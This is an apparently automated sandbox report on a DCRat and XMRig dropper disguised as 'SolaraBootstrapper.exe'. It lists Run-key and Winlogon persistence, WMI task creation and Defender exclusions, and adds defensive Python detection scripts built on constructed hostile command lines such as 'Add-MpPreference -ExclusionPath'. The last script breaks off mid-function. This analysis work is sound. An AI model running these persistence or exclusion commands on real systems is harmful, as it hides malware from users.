Analysis
max time kernel: 47s
max time network: 601s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-07-2024 19:38

Behavioral task: behavioral1
Sample: SolaraBootstrapper.exe
Resource: win10v2004-20240709-en

General
Target: SolaraBootstrapper.exe
Size: 9.5MB
MD5: 7d9b8cef5925d1a700d720743bf61865
SHA1: 10321760a98c0220be157441ae0516a5003ceba3
SHA256: 1f3a8ed14dcf8dd8b4a88787b08163b9e9d65d999e61645b90c0c91b6a8f71fd
SHA512: 793cf9f9641cd3c79fdba67af80d4ecf4b17ba4c151cc4696504740db64aaf309caeec1497273092a825e3543109f1172648193b9ae8a15d57b1501b74d2f8a9
SSDEEP: 196608:ZE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5d66w:ZE9B0OjrdLK4J/n66w
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal RAT (DCRat) is a .NET remote access trojan, active since June 2019, that can load additional plugins.
Processes: schtasks.exe (63 instances), SolaraBootstrapper.exe
pid process
schtasks.exe pids: 1408, 688, 4176, 2756, 3168, 7060, 2948, 6252, 6996, 964, 3336, 1272, 6560, 2348, 1728, 2472, 6116, 5360, 5848, 2476, 2384, 6216, 3116, 5092, 4468, 5428, 4892, 4832, 3516, 116, 4060, 1508, 4532, 6636, 2492, 3444, 1916, 4940, 6188, 4468, 4440, 2944, 2756, 4188, 4392, 3208, 2836, 376, 4828, 2004, 7112, 3876, 2472, 544, 3916, 6232, 2728, 6576, 4660, 2420, 4420, 7012, 4788
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation SolaraBootstrapper.exe
-
Modifies WinLogon for persistence 2 TTPs 22 IoCs
At interactive logon Winlogon starts the programs listed in Userinit, and userinit.exe then starts the programs listed in Shell. Both values are comma-separated lists, so appending a path after userinit.exe or explorer.exe starts it at every logon while the normal desktop still comes up.
Processes: faildsfsdf.exe, Refcrt.exe, Roblox.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (written by faildsfsdf.exe):
C:\Windows\System32\userinit.exe,C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, 21 writes. Every write re-sets the value to explorer.exe followed by all implants appended so far (each path double-quoted), so each write adds exactly one entry. The entries are listed in the order they occupy in the value; the report's table itself is not in chronological order. Entries 1-19 were written by Refcrt.exe, entries 20-21 by Roblox.exe.
1. C:\Recovery\WindowsRE\csrss.exe
2. C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe
3. C:\DriversavessessionDlldhcp\Refcrt.exe
4. C:\Windows\Vss\Writers\Application\WmiPrvSE.exe
5. C:\Windows\SKB\LanguageModels\RuntimeBroker.exe
6. C:\Program Files\WindowsPowerShell\dllhost.exe
7. C:\Program Files\Uninstall Information\SolaraBootstrapper.exe
8. C:\Windows\Cursors\smss.exe
9. C:\Users\Default\Pictures\Registry.exe
10. C:\Recovery\WindowsRE\backgroundTaskHost.exe
11. C:\Windows\fr-FR\conhost.exe
12. C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe
13. C:\DriversavessessionDlldhcp\cmd.exe
14. C:\Recovery\WindowsRE\conhost.exe
15. C:\winNet\fontdrvhost.exe
16. C:\winNet\Refcrt.exe
17. C:\Users\All Users\Documents\conhost.exe
18. C:\DriversavessessionDlldhcp\sysmon.exe
19. C:\Recovery\WindowsRE\Refcrt.exe
20. C:\Users\Admin\AppData\Local\TrustedInstaller.exe
21. C:\DriversavessessionDlldhcp\Roblox.exe
Most of the implant names copy Windows binaries (csrss, smss, conhost, dllhost, RuntimeBroker, WmiPrvSE, fontdrvhost, backgroundTaskHost, cmd, TrustedInstaller) but none of the paths is under System32, SysWOW64 or C:\Windows\servicing, where the genuine files live.
-
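The Shell and Userinit values above as a practitioner would check them. This is an added example, not part of the report or of the sample: it splits the comma-separated list the way Winlogon does, drops the stock entry, and flags entries that borrow a Windows binary's name while living outside System32, SysWOW64 or C:\Windows\servicing. The two sample strings are copied from the report; the lists of default values, impersonated names and expected directories are the example's own assumptions.

```python
"""Audit Winlogon Shell/Userinit values for implanted entries.

Added example for this report, not part of the sandbox output. The sample
values are the Userinit string written by faildsfsdf.exe and the final Shell
string written by Roblox.exe, as recorded in the report above.
"""
import csv
from pathlib import PureWindowsPath

# Stock values on Windows 10 (compared case-insensitively).
DEFAULTS = {
    "shell": {"explorer.exe"},
    "userinit": {r"c:\windows\system32\userinit.exe"},
}

# Windows binaries whose names this sample reuses for its implants. Genuine
# copies live under System32/SysWOW64 (TrustedInstaller.exe under
# C:\Windows\servicing). sysmon.exe (a Sysinternals tool) and Registry.exe
# (the kernel "Registry" process has no .exe) are deliberately not listed.
WINDOWS_NAMES = {
    "csrss.exe", "smss.exe", "conhost.exe", "dllhost.exe", "runtimebroker.exe",
    "wmiprvse.exe", "fontdrvhost.exe", "backgroundtaskhost.exe", "cmd.exe",
    "trustedinstaller.exe", "explorer.exe", "userinit.exe",
}
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                 "c:\\windows\\servicing\\")


def split_winlogon_value(value: str) -> list[str]:
    """Split a Shell/Userinit string into its program entries.

    Winlogon reads the value as a comma-separated list. Entries may be
    double-quoted (paths with spaces) and the stock Userinit value ends with
    a trailing comma, so empty entries are dropped.
    """
    row = next(csv.reader([value], skipinitialspace=True))
    return [entry.strip() for entry in row if entry.strip()]


def audit_winlogon(name: str, value: str) -> list[dict]:
    """Return one finding per entry that is not the stock default for `name`.

    A finding notes whether the file name impersonates a Windows binary and
    whether the path lies outside the directories the genuine binary uses.
    """
    defaults = DEFAULTS[name.lower()]
    findings = []
    for entry in split_winlogon_value(value):
        lower = entry.lower()
        if lower in defaults:
            continue
        findings.append({
            "value": name,
            "path": entry,
            "masquerades": PureWindowsPath(entry).name.lower() in WINDOWS_NAMES,
            "outside_expected_dirs": not lower.startswith(EXPECTED_DIRS),
        })
    return findings


# Values recorded in the report for this sample.
SAMPLE_USERINIT = (r"C:\Windows\System32\userinit.exe,"
                   r"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe")
IMPLANTS = [
    r"C:\Recovery\WindowsRE\csrss.exe",
    r"C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe",
    r"C:\DriversavessessionDlldhcp\Refcrt.exe",
    r"C:\Windows\Vss\Writers\Application\WmiPrvSE.exe",
    r"C:\Windows\SKB\LanguageModels\RuntimeBroker.exe",
    r"C:\Program Files\WindowsPowerShell\dllhost.exe",
    r"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe",
    r"C:\Windows\Cursors\smss.exe",
    r"C:\Users\Default\Pictures\Registry.exe",
    r"C:\Recovery\WindowsRE\backgroundTaskHost.exe",
    r"C:\Windows\fr-FR\conhost.exe",
    r"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe",
    r"C:\DriversavessessionDlldhcp\cmd.exe",
    r"C:\Recovery\WindowsRE\conhost.exe",
    r"C:\winNet\fontdrvhost.exe",
    r"C:\winNet\Refcrt.exe",
    r"C:\Users\All Users\Documents\conhost.exe",
    r"C:\DriversavessessionDlldhcp\sysmon.exe",
    r"C:\Recovery\WindowsRE\Refcrt.exe",
    r"C:\Users\Admin\AppData\Local\TrustedInstaller.exe",
    r"C:\DriversavessessionDlldhcp\Roblox.exe",
]
SAMPLE_SHELL = "explorer.exe, " + ", ".join(f'"{p}"' for p in IMPLANTS)

if __name__ == "__main__":
    for name, value in (("Userinit", SAMPLE_USERINIT), ("Shell", SAMPLE_SHELL)):
        for f in audit_winlogon(name, value):
            flags = [k for k in ("masquerades", "outside_expected_dirs") if f[k]]
            print(f"{name}: {f['path']}  [{', '.join(flags)}]")
```

On the report's final Shell value this yields 21 findings, 13 of them impersonating a Windows binary and all 21 outside the expected directories; the Userinit value yields one finding (xdwdSublime Text.exe). A value consisting only of explorer.exe, or the stock userinit.exe with its trailing comma, yields none.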
Process spawned unexpected child process 63 IoCs
The sandbox's generic note for this signature is that the parent was compromised via an exploit or macro. For WmiPrvSE.exe the more common explanation is process creation through WMI (Win32_Process.Create): the WMI provider host, not the caller, becomes the parent of whatever was launched. Here all 63 children are schtasks.exe under a single WmiPrvSE.exe instance, consistent with the sample registering its scheduled tasks through WMI rather than starting schtasks.exe itself.
Processes: schtasks.exe (63 instances)
Parent C:\Windows\system32\wbem\wmiprvse.exe (pid 2496) is not expected to spawn this process; child schtasks.exe pids:
3116, 3444, 3208, 5092, 4832, 4188, 4788, 3776, 4420, 544, 3040, 2756, 4160, 3864, 4940, 2556, 3204, 2012, 60, 1520, 1032, 3168, 1688, 2836, 3252, 4240, 1272, 2156, 1552, 1408, 3400, 1728, 324, 1916, 3720, 4704, 2420, 4060, 3116, 552, 2492, 3208, 4364, 2476, 3516, 4440, 2404, 2944, 4468, 2004, 1924, 2756, 4660, 3536, 1776, 2264, 3336, 4924, 5124, 4468, 544, 6112, 6036
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\Youtube.exe dcrat
behavioral1/memory/5044-20-0x0000000000400000-0x0000000000D8F000-memory.dmp dcrat
C:\Users\Admin\AppData\Local\Temp\Result.exe dcrat
behavioral1/memory/5072-56-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat
C:\Users\Admin\AppData\Local\Temp\solara.exe dcrat
behavioral1/memory/5100-87-0x0000000000400000-0x000000000069B000-memory.dmp dcrat
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe dcrat
behavioral1/memory/4084-108-0x00000000004B0000-0x0000000000634000-memory.dmp dcrat
-
XMRig Miner payload 11 IoCs
Processes: pid 5772
resource yara_rule
Eleven dumps of the same region of pid 5772 match xmrig: behavioral1/memory/5772-N-0x0000000140000000-0x0000000140786000-memory.dmp for N = 1036, 1038, 1047, 1048, 1049, 1050, 1051, 1114, 1373, 1374, 1375. The region base 0x140000000 is the default image base of a 64-bit PE, consistent with a 64-bit miner image mapped at its preferred address.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 39 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.
Processes: powershell.exe (39 instances)
pid process
powershell.exe pids: 2748, 1032, 60, 400, 5444, 1852, 5928, 828, 416, 7124, 2812, 5856, 6232, 5412, 1688, 3380, 6700, 4172, 2700, 5952, 5728, 388, 456, 3688, 924, 3680, 4100, 2836, 1664, 3116, 1116, 1996, 4364, 3168, 1520, 3616, 5744, 5912, 7060
-
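The two process-level signatures above, schtasks.exe spawned by WmiPrvSE.exe and PowerShell adding Defender exclusions, written as detection logic over process-creation events. This is an added example, not sandbox output or code from the sample. The events, task names and Add-MpPreference arguments are constructed for the example, because the report records neither the task definitions nor the PowerShell command lines; only the parent image, the pid 2496 and the child image names come from the report.

```python
"""Flag the two process-creation patterns this report records.

Added example for this report, not sandbox output. The events are constructed
to mirror the report: WmiPrvSE.exe (pid 2496) spawning schtasks.exe, and
powershell.exe adding Defender exclusions. All command lines are assumptions;
the report gives neither the task definitions nor the Add-MpPreference
arguments.
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Children WmiPrvSE.exe should not spawn in normal operation. A process started
# through WMI (Win32_Process.Create) gets WmiPrvSE.exe as its parent, so a
# burst of these is a "tasks created via WMI" pattern rather than an exploit.
UNEXPECTED_CHILDREN = {
    "wmiprvse.exe": {"schtasks.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                     "cscript.exe", "rundll32.exe", "regsvr32.exe"},
}

# Add-MpPreference with any of the three exclusion kinds the report names.
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b",
    re.IGNORECASE | re.DOTALL,
)


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> list[str]:
    """Return alerts for one process-creation event (Sysmon event 1 fields)."""
    parent, child = image_name(ev["parent_image"]), image_name(ev["image"])
    alerts = []
    if child in UNEXPECTED_CHILDREN.get(parent, ()):
        alerts.append(f"unexpected child: {parent} (pid {ev['parent_pid']}) "
                      f"-> {child} (pid {ev['pid']})")
    if child in ("powershell.exe", "pwsh.exe"):
        m = DEFENDER_EXCLUSION.search(ev["command_line"])
        if m:
            alerts.append(f"Defender exclusion via -Exclusion{m.group(1)} "
                          f"(pid {ev['pid']}, parent {parent})")
    return alerts


def scan(events: list[dict]) -> list[str]:
    return [alert for ev in events for alert in check_event(ev)]


def children_by_parent(events: list[dict], child_name: str) -> dict[int, int]:
    """Count how many `child_name` processes each parent pid started.

    The report shows 63 schtasks.exe children under one WmiPrvSE.exe
    (pid 2496); a count this high from a single parent is itself a signal.
    """
    return dict(Counter(ev["parent_pid"] for ev in events
                        if image_name(ev["image"]) == child_name))


def event(pid, image, parent_pid, parent_image, command_line):
    return {"pid": pid, "image": image, "parent_pid": parent_pid,
            "parent_image": parent_image, "command_line": command_line}


WMIPRVSE = r"C:\Windows\system32\wbem\wmiprvse.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events. Task names, schedules and PowerShell arguments are assumed.
SAMPLE_EVENTS = [
    event(3116, SCHTASKS, 2496, WMIPRVSE,
          r'schtasks.exe /create /tn "csrss" /sc minute /mo 5 '
          r'/tr "C:\Recovery\WindowsRE\csrss.exe" /f'),
    event(3444, SCHTASKS, 2496, WMIPRVSE,
          r'schtasks.exe /create /tn "Refcrt" /sc onlogon '
          r'/tr "C:\DriversavessessionDlldhcp\Refcrt.exe" /f'),
    # WmiPrvSE.exe itself is hosted normally (parent svchost.exe): no alert.
    event(2496, WMIPRVSE, 820, r"C:\Windows\System32\svchost.exe", WMIPRVSE),
    # The implant excluding its own drop directory (arguments assumed).
    event(2748, POWERSHELL, 4084, r"C:\DriversavessessionDlldhcp\Refcrt.exe",
          r'powershell -Command Add-MpPreference -ExclusionPath "C:\Recovery\WindowsRE"'),
    # Read-only Defender query: no alert.
    event(1032, POWERSHELL, 4084, r"C:\DriversavessessionDlldhcp\Refcrt.exe",
          "powershell Get-MpPreference"),
    # schtasks from an interactive shell: parent not in the rule, no alert.
    event(5000, SCHTASKS, 4400, r"C:\Windows\System32\cmd.exe", "schtasks /query"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
    print(children_by_parent(SAMPLE_EVENTS, "schtasks.exe"))
```

The regex is a floor, not a ceiling: PowerShell accepts any unambiguous parameter prefix (-ExclusionPa resolves to -ExclusionPath), and -EncodedCommand hides the text entirely, so command-line matching should be paired with script block logging (event 4104) to catch the same change in obfuscated form.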
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
.NET Reactor protector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\Youtube.exe net_reactor
behavioral1/memory/5044-20-0x0000000000400000-0x0000000000D8F000-memory.dmp net_reactor
behavioral1/memory/5072-56-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up the country code configured in the registry (Control Panel\International\Geo\Nation), a likely geofence check.
Processes: Youtube.exe, DCRatBuild.exe, solara.exe, WScript.exe (3 instances), ComContainerbrowserRefRuntime.exe, Roblox.exe, SolaraBootstrapper.exe, Result.exe, Frage build.exe, Refcrt.exe
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation by each of the 12 processes above.
-
Executes dropped EXE 15 IoCs
Processes:
pid process
5072 Youtube.exe
2568 faildsfsdf.exe
5100 Result.exe
4140 DCRatBuild.exe
392 Bloxstrap.exe
1660 Frage build.exe
3012 SolaraBootstrapper.exe
3504 solara.exe
4084 Refcrt.exe
6104 smss.exe
2556 ComContainerbrowserRefRuntime.exe
5428 Roblox.exe
7056 Bloxstrap.exe
5564 RuntimeBroker.exe
6300 TrustedInstaller.exe
-
Loads dropped DLL 64 IoCs
Processes:
pid process (the source table records no process name for 34 of the 64 entries)
MsiExec.exe: 3592, 3592, 4396, 4396, 4396
smss.exe: 6104
ComContainerbrowserRefRuntime.exe: 2556
Roblox.exe: 5428
schtasks.exe: 4924, 5124, 4468, 544, 6112, 6036
csc.exe: 6404, 6136, 1508, 3396, 6300, 5816, 5884, 1312, 6800, 6976, 6964, 7088, 7116, 5684, 3336, 6652
No process name recorded: 5608, 6352, 5972, 2740, 5300, 5888, 4060, 6164, 2156, 2264, 3784, 6016, 1072, 6272, 2808, 6640, 6796, 7012, 7100, 7152, 5764, 5608, 6684, 1456, 5416, 3260, 3652, 3952, 4288, 5704, 3460, 3044, 4880, 3604
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 43 IoCs
Processes:
Refcrt.exe, Roblox.exe, faildsfsdf.exe
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" Roblox.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" faildsfsdf.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" Refcrt.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" Roblox.exe
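The Run values above reuse the names of Windows system binaries (smss.exe, csrss.exe, conhost.exe, RuntimeBroker.exe, WmiPrvSE.exe, TrustedInstaller.exe) in directories where the genuine binary never lives, and the process tree further down shows the same paths being carved out of Defender scanning with Add-MpPreference -ExclusionPath. The following is an added example, not code from this report or from the sample, that parses both kinds of entry in the shape the sandbox renders them and flags a Run target as a masquerade when its file name is a known system binary sitting outside its expected directory. The EXPECTED_DIRS table, the verdict names and the ps_exclusion_cmd helper are this example's own assumptions; the sample rows and exclusion paths are copied from this report.

```python
"""Triage of the Run-key and Defender-exclusion indicators in a DCRat sandbox
report. Added example, not code from the report or from the sample.

Sample lines are copied from the report's "Adds Run key to start application"
table and from the Add-MpPreference command lines in its process tree. The
EXPECTED_DIRS table (where the genuine system binaries live) is an assumption
of this example; extend it for your own environment.
"""
import re
from pathlib import PureWindowsPath

# Assumed table: system-binary names DCRat reuses, and the directories in
# which the genuine binary is installed (lower-case, no trailing backslash).
EXPECTED_DIRS = {
    "smss.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "conhost.exe": {r"c:\windows\system32"},
    "cmd.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "dllhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "fontdrvhost.exe": {r"c:\windows\system32"},
    "backgroundtaskhost.exe": {r"c:\windows\system32"},
    "wmiprvse.exe": {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"},
    "trustedinstaller.exe": {r"c:\windows\servicing"},
}

# One table row as the sandbox renders it:
#   Set value (str) <key>\<name> = "<value>" <writing process>
# The value keeps the sandbox's own escaping (\" for a quote, \\ for a backslash).
RUN_ENTRY = re.compile(
    r'Set value \(str\) (?P<key>\\REGISTRY\\(?:MACHINE|USER\\S-[\d-]+)'
    r'\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run)\\(?P<name>[^=]+?) = '
    r'"(?P<value>(?:[^"\\]|\\.)*)" (?P<writer>\S+)'
)
# The single-quoted path in: "powershell" -Command Add-MpPreference -ExclusionPath '<path>'
EXCLUSION = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.IGNORECASE)


def unescape_value(raw: str) -> str:
    """Undo the report's escaping and drop the quotes the malware wrote around the path."""
    return raw.replace('\\"', '"').replace("\\\\", "\\").strip('"')


def parse_run_entries(lines):
    """Yield (hive, value name, target path, writing process) per Run entry."""
    for line in lines:
        for m in RUN_ENTRY.finditer(line):
            hive = "HKLM" if m["key"].startswith("\\REGISTRY\\MACHINE") else "HKCU"
            yield hive, m["name"].strip(), unescape_value(m["value"]), m["writer"]


def parse_exclusions(cmdlines):
    """Lower-cased set of every path handed to Add-MpPreference -ExclusionPath."""
    return {m.group(1).lower() for c in cmdlines for m in EXCLUSION.finditer(c)}


def classify(path: str) -> str:
    """'masquerade' = a system-binary file name outside its expected directory."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name not in EXPECTED_DIRS:
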